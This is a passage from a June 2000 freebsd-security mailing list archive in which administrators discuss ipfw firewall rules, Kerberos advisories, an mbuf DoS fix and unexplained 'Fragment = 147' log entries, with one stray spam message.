or previous netscape session crashed and there's still a lock file for it. > > randy > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 11:37: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from ixori.demon.nl (ixori.demon.nl [195.11.248.5]) by hub.freebsd.org (Postfix) with ESMTP id 1964737B5D5 for ; Wed, 14 Jun 2000 11:36:55 -0700 (PDT) (envelope-from bart@ixori.demon.nl) Received: from smtp-relay by ixori.demon.nl (8.9.3/8.9.2) with ESMTP id UAA08006; Wed, 14 Jun 2000 20:40:06 +0200 (CEST) (envelope-from bart@ixori.demon.nl) Received: from network (intranet) by smtp-relay (Bart's intranet smtp server) Message-ID: <3947D1C3.517223F3@ixori.demon.nl> Date: Wed, 14 Jun 2000 20:41:07 +0200 From: Bart van Leeuwen Reply-To: bart@ixori.demon.nl Organization: IxorI X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Gabor Zahemszky Cc: freebsd-security@freebsd.org Subject: Re: rc.network firewall init References: <20000614171130.E471@zg.CoDe.hu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gabor Zahemszky wrote: > 1) Well, in 4.x ipfw _is_ statefull, but as a new feature, maybe not so > many people use it. While true, this still leaves a short window during which communications are possible. This window is only really closed after all deny/reject/icmp unreach/reset rules have been loaded (or at least a deny all from any to any is added at the end) and will be 'open' again during flsh/reload. On a 486 or small pentium system that can be quite a bit more then a fraction of a second. default to accept is imho simply not suitable for a setup where such a window might be an issue. This is regardless of using a kld or not. > > 2) This problem exists, if somebody is using the other firewall, ipf, > as it's default actions are pass (yes, we can change it with that > non-documented option) > options IPFILTER_DEFAULT_BLOCK #kernel ipfilter default block Well... wouldn't documenting the feature fix that? ;-) It is usefull enough I'd think.. > Conclusion: don't use a KLD firewall! (or maybe somebody will restructure > out rc.network script, and put that changes, which will make it easier > to use ipf instead of ipfw.) Nah, just load it from /boot/loader.conf Add a line like: ipfw_load="YES" and it will be loaded and active even before init runs. Still won't help a thing with default to accept tho. On another note, I never saw the point of using a kld when ipfw is used for security purposes, but that might just be me. The only reason I can think off is being able to boot the machine to single user mode without ipfw support, but I never encountered a situation where i might want to do that ;-) Oh well, and of course someone might want to do this in order to not have to compile a new kernel... well... the time it takes to build that kernel is likely to be very short when compared to the time it takes to create a decent ipfw ruleset, and well worth the efford I think. -- Bart van Leeuwen ----------------------------------------------------------- mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/ ----------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 12:30:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id A8C7137BD10 for ; Wed, 14 Jun 2000 12:30:41 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id MAA03515; Wed, 14 Jun 2000 12:33:49 -0400 (EDT) (envelope-from wollman) Date: Wed, 14 Jun 2000 12:33:49 -0400 (EDT) From: Garrett Wollman Message-Id: <200006141633.MAA03515@khavrinen.lcs.mit.edu> To: Tushar Patel Cc: Cy.Schubert@uumail.gov.bc.ca, freebsd-security@FreeBSD.ORG Subject: Re: Kerberos for POP, radius, ftp etc In-Reply-To: <200006141451.JAA08402@ecpi.com> References: <200006141417.e5EEHi431392@cwsys.cwsent.com> <200006141451.JAA08402@ecpi.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > So, how do people change the authentication process to kerberos without > involving the end user? Most places use a registration procedure. For example, in the Athena Computing Environment, there are registration servers which have write access to the Kerberos KDC; new users log in using a special account and prove their identity using an out-of-band mechanism. (We don't do anything like that here at LCS.) One of the hacks that used to run here went in the opposite direction: if a user was able to authenticate with Kerberos, their local password would be changed automatically to be the same as their Kerberos password. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 13:35:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from horizon.barak-online.net (horizon.barak.net.il [206.49.94.218]) by hub.freebsd.org (Postfix) with ESMTP id 785F037C245 for ; Wed, 14 Jun 2000 13:34:58 -0700 (PDT) (envelope-from bk532@iname.com) Received: from localhost.local.net (pop09-1-ras1-p180.barak.net.il [212.150.8.180]) by horizon.barak-online.net (8.9.3/8.9.1) with ESMTP id XAA15070; Wed, 14 Jun 2000 23:34:01 +0300 (IDT) Received: from iname.com (localhost.local.net [127.0.0.1]) by localhost.local.net (8.9.3/8.9.3) with ESMTP id NAA16732; Wed, 14 Jun 2000 13:46:48 +0300 (IDT) (envelope-from bk532@iname.com) Message-ID: <39476294.5A2D178D@iname.com> Date: Wed, 14 Jun 2000 13:46:44 +0300 From: Boris Karnaukh Organization: Private person X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.4-STABLE i386) X-Accept-Language: en, ru MIME-Version: 1.0 To: Hugh Ho , freebsd-security@freebsd.org Subject: Re: IPFW rules for DNS? References: <20000613014237.10942.qmail@web210.mail.yahoo.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hugh Ho wrote: > > I need to do nslookup quite often, and I have the following IPFW rules which > allow nslookup to talk to my ISP's DNS server: > > allow udp from ${my_ip} to ${dns_server} 53 > allow udp from ${dns_server} 53 to ${my_ip} > > Problem with the above rules is that people can pass IPFW if they use UDP port > 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to fix my > problem? You can try to implement keep-state/check-state in your ruleset. check-state allow udp from ${my_ip} to ${dns_server} 53 keep-state I think that approach can shorten period of time when your computer is opened to udp traffic from outside. Thus you'll be not so vulnerable to incoming stream of spoofed DNS replies. -- Boris Karnaukh (mailto:bk532@iname.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 19:20:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from rhubarb.fwi.com (rhubarb.fwi.com [209.84.175.126]) by hub.freebsd.org (Postfix) with SMTP id 31F8F37BF23 for ; Wed, 14 Jun 2000 19:20:41 -0700 (PDT) (envelope-from peeter@rhubarb.fwi.com) Received: (qmail 1868 invoked by uid 1000); 15 Jun 2000 02:22:10 -0000 Date: Wed, 14 Jun 2000 21:22:10 -0500 From: Peeter Pirn To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: netbios Message-ID: <20000614212210.A1854@rhubarb.fwi.com> References: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="UugvWAfsgieZRqgk" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU>; from George.Giles@mcmail.vanderbilt.edu on Tue, Jun 13, 2000 at 07:58:30AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --UugvWAfsgieZRqgk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline See attached file. On Tue, Jun 13, 2000 at 07:58:30AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > > > I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139 > open called NETBIOS. How do I close? -- Peeter Pirn - peeter@rhubarb.fwi.com --UugvWAfsgieZRqgk Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=fw In the rules below, I have taken my `allow' firewall rules that allow Samba to run on my internal network and changed them to `deny'. This should block some, if not all, NETBIOS packets. Note that the first rule applies to incoming packets for the broadcast address, not the address of the interface. # # Deny NETBIOS from internal network. Will block Samba communications. # /sbin/ipfw add 30100 deny log udp from 10.0.0.0/24 137 to 10.0.0.255 137 via 10.0.0.254 /sbin/ipfw add 30110 deny log udp from 10.0.0.254 137 to 10.0.0.1/24 137 via 10.0.0.254 /sbin/ipfw add 30200 deny log udp from 10.0.0.254 138 to 10.0.0.0/24 138 via 10.0.0.254 /sbin/ipfw add 30300 deny log tcp from 10.0.0.1/24 to 10.0.0.254 139 via 10.0.0.254 /sbin/ipfw add 30310 deny log tcp from 10.0.0.254 139 to 10.0.0.1/24 via 10.0.0.254 --UugvWAfsgieZRqgk-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 21:46:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id BA92437BD59 for ; Wed, 14 Jun 2000 21:46:08 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 35212 invoked by uid 1000); 15 Jun 2000 04:45:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Jun 2000 04:45:59 -0000 Date: Wed, 14 Jun 2000 23:45:59 -0500 (CDT) From: Mike Silbersack To: freebsd-security@freebsd.org Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected In-Reply-To: <20000614174706.F78775@closed-networks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Jun 2000, User Datagram Protocol wrote: > Eww. What a lame DoS attack. > > On Wed, Aug 02, 2000 at 08:41:53AM -0300, Ussr Labs wrote: > > an unpriviledged user can panic the kernel. Quick and dirty testing > > > ... > > Big deal. So what do we do about it? Implement per-process mbuf usage limits? > Eww. Good news. Jonathan Lemon committed the mbuf wait MFC to the 3 branch a few days ago, so we can now simply tell people to cvsup if they're worried about someone trying a mbuf exhaustion on them. (Granted, the handling of such an attack isn't perfect for all cases, but the panic is gone.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 15 6:51: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from kobayashi.uits.iupui.edu (kobayashi.uits.iupui.edu [134.68.11.80]) by hub.freebsd.org (Postfix) with ESMTP id CF04237BD12 for ; Thu, 15 Jun 2000 06:50:51 -0700 (PDT) (envelope-from ajk@iu.edu) Received: from localhost (ajk@localhost) by kobayashi.uits.iupui.edu (8.9.3/8.9.3) with ESMTP id IAA45770 for ; Thu, 15 Jun 2000 08:50:50 -0500 (EST) (envelope-from ajk@iu.edu) Date: Thu, 15 Jun 2000 08:50:50 -0500 (EST) From: "Andrew J. Korty" X-Sender: ajk@kobayashi.uits.iupui.edu To: freebsd-security@freebsd.org Subject: Kerberos IV DoS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has the effects of CERT Advisory CA-2000-11 on FreeBSD been addressed? Our version of Kerberos IV should not be affected, but the MIT advisory at http://web.mit.edu/kerberos/www/advisories/krb4kdc.txt states that Kerberos V vulnerability depends on the underlying malloc() implementation. -- Andrew J. Korty, Lead Security Engineer Office of the Vice President for Information Technology Indiana University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 15 7:55:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 396F137B86E for ; Thu, 15 Jun 2000 07:55:35 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA23605; Thu, 15 Jun 2000 07:55:03 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda23599; Thu Jun 15 07:54:47 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA64097; Thu, 15 Jun 2000 07:54:47 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdF64081; Thu Jun 15 07:54:15 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.2/8.9.1) id e5FEsF463079; Thu, 15 Jun 2000 07:54:15 -0700 (PDT) Message-Id: <200006151454.e5FEsF463079@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdO63072; Thu Jun 15 07:53:49 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: "Andrew J. Korty" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Kerberos IV DoS In-reply-to: Your message of "Thu, 15 Jun 2000 08:50:50 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 15 Jun 2000 07:53:49 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Andrew J. Korty" writes: > Has the effects of CERT Advisory CA-2000-11 on FreeBSD been > addressed? Our version of Kerberos IV should not be affected, > but the MIT advisory at > > http://web.mit.edu/kerberos/www/advisories/krb4kdc.txt > > states that Kerberos V vulnerability depends on the underlying > malloc() implementation. The Heimdal version of Kerberos V that's in the FreeBSD base is not affected. The krb5 port in the ports collection is affected. I've submitted a PR this morning to address this and the GSSFTP vulnerability patch released by MIT yesterday. The PR number is ports/19301. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 15 10:45:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from d135.p6.col.ru (d135.p6.col.ru [212.248.5.135]) by hub.freebsd.org (Postfix) with SMTP id 847FE37BD1E; Thu, 15 Jun 2000 10:45:16 -0700 (PDT) (envelope-from prettylady@freemail.ru) From: To: Date: ×ò, 15 èþí 2000 20:43:24 +0400 Message-ID: <14353557731401516@d135.p6.col.ru> Subject: Hi, its for you ! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! We are Russian girls - Natali, Alla, Vika. We would like to correspond with you. Visit our site and see our photos. http://www.russiangirls.narod.ru/ With interest, Natali,Alla, Vika. P.S. (This is not spam. You can unsubscribe at any time by sending an email to prettylady@freemail.ru with the subject UNSUBSCRIBE.) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 6: 4:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from europe.std.com (europe.std.com [199.172.62.20]) by hub.freebsd.org (Postfix) with ESMTP id 0A20237BE82 for ; Fri, 16 Jun 2000 06:04:11 -0700 (PDT) (envelope-from lowell@world.std.com) Received: from world.std.com (lowell@world-f.std.com [199.172.62.5]) by europe.std.com (8.9.3/8.9.3) with ESMTP id JAA20081; Fri, 16 Jun 2000 09:04:02 -0400 (EDT) Received: (from lowell@localhost) by world.std.com (8.9.3/8.9.3) id JAA26406; Fri, 16 Jun 2000 09:04:02 -0400 (EDT) To: John F Cuzzola , freebsd-security@freebsd.org Subject: Re: ipfw log entry References: From: Lowell Gilbert Date: 16 Jun 2000 09:04:01 -0400 In-Reply-To: John F Cuzzola's message of Tue, 13 Jun 2000 16:25:04 -0700 (PDT) Message-ID: Lines: 41 X-Mailer: Gnus v5.5/Emacs 20.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, no one else has spoken up, so I'm taking a shot at it. John F Cuzzola writes: > Hi everyone, > On one of our firewalls numerous entries looking like this were logged: > > ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147 > > > I haven't seen this one before. Is this a packet that FreeBSD explicitly > blocks regardless of the firewall rules and if so what is its > intent/purpose? (Basically what I'm asking is does this look like hacker > activity). Without looking at the code, it's hard to say what's happening here. ipfw_report() is getting called with no rule associated. The only case the documentation mentions that might be related is the "always discard" situation of a frag with an offset of one. This packet, though, has a fragment of 147 (slightly larger than the required minimum packet size that any IP device has to be able to handle), so nothing being reported sounds illegitimate. If I had to hazard a guess, I'd say this sounds like a bug in how the reporting routine gets called from somewhere. The only place this could get called from without the associated rule is the bogusfrag label in ip_fw.c. Aside from fragment offsets of one, there's a PULLUP_TO() macro that jumps there. I don't really know BSD mbufs that well, but it looks like the situation being detected is a frame shorter than the IP length. If I'm right, this is very unlikely to be hacker activity. In fact, the situation being detected has to originate on your local wire. I may be wrong, though, because I thought that kind of error should get picked up as an input error on the interface. If we're lucky, Luigi will speak up to tell us whether I'm completely insane. Be well. Lowell Gilbert To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 11:41: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from web209.mail.yahoo.com (web209.mail.yahoo.com [128.11.68.109]) by hub.freebsd.org (Postfix) with SMTP id B0B9437B981 for ; Fri, 16 Jun 2000 11:41:02 -0700 (PDT) (envelope-from hho321@yahoo.com) Received: (qmail 16100 invoked by uid 60001); 16 Jun 2000 18:41:01 -0000 Message-ID: <20000616184101.16099.qmail@web209.mail.yahoo.com> Received: from [216.33.112.207] by web209.mail.yahoo.com; Fri, 16 Jun 2000 11:41:01 PDT Date: Fri, 16 Jun 2000 11:41:01 -0700 (PDT) From: Hugh Ho Subject: RE: IPFW rules for DNS? To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank everyone who gave me advices. -Hugh __________________________________________________ Do You Yahoo!? Send instant messages with Yahoo! Messenger. http://im.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 12:14:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from gaia.nimnet.asn.au (nimbin.lnk.telstra.net [139.130.45.143]) by hub.freebsd.org (Postfix) with ESMTP id 7C7F937B828 for ; Fri, 16 Jun 2000 12:14:30 -0700 (PDT) (envelope-from smithi@nimnet.asn.au) Received: from localhost (smithi@localhost) by gaia.nimnet.asn.au (8.8.8/8.8.8R1.0) with SMTP id FAA13102; Sat, 17 Jun 2000 05:14:08 +1000 (EST) (envelope-from smithi@nimnet.asn.au) Date: Sat, 17 Jun 2000 05:14:07 +1000 (EST) From: Ian Smith Reply-To: Ian Smith To: Lowell Gilbert Cc: John F Cuzzola , freebsd-security@FreeBSD.ORG Subject: Re: ipfw log entry In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 16 Jun 2000, Lowell Gilbert wrote: > Well, no one else has spoken up, so I'm taking a shot at it. > > John F Cuzzola writes: > > > Hi everyone, > > On one of our firewalls numerous entries looking like this were logged: > > > > ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147 > > > > > > I haven't seen this one before. Is this a packet that FreeBSD explicitly > > blocks regardless of the firewall rules and if so what is its > > intent/purpose? (Basically what I'm asking is does this look like hacker > > activity). > > Without looking at the code, it's hard to say what's happening here. > ipfw_report() is getting called with no rule associated. The only > case the documentation mentions that might be related is the "always > discard" situation of a frag with an offset of one. This packet, > though, has a fragment of 147 (slightly larger than the required > minimum packet size that any IP device has to be able to handle), so > nothing being reported sounds illegitimate. As I mentioned to John, this host is res6.geocities.com. We see these here usually in big batches, perhaps about once a month on average, eg: May 22 18:14:39 gaia /kernel: ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147 Rule 65000 is 'count log tcp from any to any in', one of some counts by protocol before being silently denied by 65535, deny ip from any to any. 65000 usually only logs non-established, non-setup TCP packets. I'm not sure whether all traffic from that site suffers this fate or just chunks of it. Note, no TCP port numbers were specified, or logged at any rate. [.. speculation on likely causes in the ipfw code blissfully ignored ..] > If I'm right, this is very unlikely to be hacker activity. In fact, > the situation being detected has to originate on your local wire. I > may be wrong, though, because I thought that kind of error should get > picked up as an input error on the interface. Don't think it's any 'activity' either, more likely something broken at res6.geocities.com. Noticed another site occasionally w/fragment = 184. Haven't asked these (dialup) folks what wasn't working for them, as they seem also skilled at finding perhaps related sites, hoping to establish http connections with URLs from nets 10/8, 172.16/12 and 192.168/16 :-) > If we're lucky, Luigi will speak up to tell us whether I'm completely > insane. That would be comforting I'm sure :-) Cheers, Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 12:32:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from ixori.demon.nl (ixori.demon.nl [195.11.248.5]) by hub.freebsd.org (Postfix) with ESMTP id EC3C737B828 for ; Fri, 16 Jun 2000 12:32:46 -0700 (PDT) (envelope-from bart@ixori.demon.nl) Received: from smtp-relay by ixori.demon.nl (8.9.3/8.9.2) with ESMTP id VAA12537; Fri, 16 Jun 2000 21:35:42 +0200 (CEST) (envelope-from bart@ixori.demon.nl) Received: from network (intranet) by smtp-relay (Bart's intranet smtp server) Date: Fri, 16 Jun 2000 21:36:38 +0200 (CEST) From: Bart van Leeuwen To: Lowell Gilbert Cc: John F Cuzzola , freebsd-security@freebsd.org Subject: Re: ipfw log entry In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 16 Jun 2000, Lowell Gilbert wrote: > Well, no one else has spoken up, so I'm taking a shot at it. > > John F Cuzzola writes: > > > Hi everyone, > > On one of our firewalls numerous entries looking like this were logged: > > > > ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147 > > > > > > I haven't seen this one before. Is this a packet that FreeBSD explicitly > > blocks regardless of the firewall rules and if so what is its > > intent/purpose? (Basically what I'm asking is does this look like hacker > > activity). > > Without looking at the code, it's hard to say what's happening here. > ipfw_report() is getting called with no rule associated. The only > case the documentation mentions that might be related is the "always > discard" situation of a frag with an offset of one. This packet, > though, has a fragment of 147 (slightly larger than the required > minimum packet size that any IP device has to be able to handle), so > nothing being reported sounds illegitimate. > > If I had to hazard a guess, I'd say this sounds like a bug in how the > reporting routine gets called from somewhere. The only place this > could get called from without the associated rule is the bogusfrag > label in ip_fw.c. Aside from fragment offsets of one, there's a > PULLUP_TO() macro that jumps there. I don't really know BSD mbufs > that well, but it looks like the situation being detected is a frame > shorter than the IP length. > > If I'm right, this is very unlikely to be hacker activity. In fact, > the situation being detected has to originate on your local wire. I > may be wrong, though, because I thought that kind of error should get > picked up as an input error on the interface. Well, I'm far from an expert on mbufs, but a quick peak at the code suggests that the other way to get such a log entry would be if allocating a mbuf fails in m_pullup. In that case I'd think its a tunning matter. I can imagine that this happens when receiving a lot of fragments before the packet can be reassembled or when the firewall machine gets a huge amount of packets to handle in general. If I remeber correctly man dummynet suggests that you might need more mbufs because of dummynet and using ipfw. > > If we're lucky, Luigi will speak up to tell us whether I'm completely > insane. Heh.. I won't comment on that ;-) tho... maybe Luigi can tell me if I'm insane as well.. have been wondering for years ;-) Bart. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 13:22:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id C977137C426 for ; Fri, 16 Jun 2000 13:22:09 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id QAA86724; Fri, 16 Jun 2000 16:22:04 -0400 (EDT) (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id QAA03095; Fri, 16 Jun 2000 16:22:04 -0400 (EDT) Message-Id: <3.0.5.32.20000616161818.0284a960@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Fri, 16 Jun 2000 16:18:18 -0400 To: Ian Smith From: Mike Tancsa Subject: Re: ipfw log entry Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:14 AM 6/17/00 +1000, Ian Smith wrote: >As I mentioned to John, this host is res6.geocities.com. We see these >here usually in big batches, perhaps about once a month on average, eg: > >May 22 18:14:39 gaia /kernel: > ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147 I thought I recognized that IP address... ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 Sheesh! We lots of this in our logs as well. ---Mike ------------------------------------------------------------------------ Mike Tancsa, tel +1 519 651 3400 Sentex Communications mike@sentex.net Cambridge, Ontario Canada www.sentex.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 14:16:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.wolves.k12.mo.us (mail.wolves.k12.mo.us [207.160.214.1]) by hub.freebsd.org (Postfix) with ESMTP id A2E2D37C09E for ; Fri, 16 Jun 2000 14:16:19 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from mail.wolves.k12.mo.us (cdillon@mail.wolves.k12.mo.us [207.160.214.1]) by mail.wolves.k12.mo.us (8.9.3/8.9.3) with ESMTP id QAA46804; Fri, 16 Jun 2000 16:16:08 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Fri, 16 Jun 2000 16:16:08 -0500 (CDT) From: Chris Dillon To: Mike Tancsa Cc: Ian Smith , freebsd-security@FreeBSD.ORG Subject: Re: ipfw log entry In-Reply-To: <3.0.5.32.20000616161818.0284a960@marble.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Jun 2000, Mike Tancsa wrote: > At 05:14 AM 6/17/00 +1000, Ian Smith wrote: > >As I mentioned to John, this host is res6.geocities.com. We see these > >here usually in big batches, perhaps about once a month on average, eg: > > > >May 22 18:14:39 gaia /kernel: > > ipfw: 65000 Count TCP 209.1.224.16 203.41.52.xxx in via tun0 Fragment = 147 > > I thought I recognized that IP address... > > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 > ipfw: -1 Refuse TCP 209.1.224.16 206.130.91.146 in via fxp2 Fragment = 147 > > Sheesh! We lots of this in our logs as well. Ditto. I get these quite often. ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 ipfw: -1 Refuse TCP 209.1.224.16 207.160.214.253 in via fxp7 Fragment = 147 Anyone figured out what/who this is yet? -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and Alpha architectures. ( http://www.freebsd.org ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 16 14:51:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 2FC8E37B722; Fri, 16 Jun 2000 14:51:20 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.9.3/8.9.3) with ESMTP id WAA08618; Fri, 16 Jun 2000 22:48:07 +0100 (BST) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id WAA02840; Fri, 16 Jun 2000 22:48:04 +0100 (BST) (envelope-from brian@Awfulhak.org) Message-Id: <200006162148.WAA02840@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: 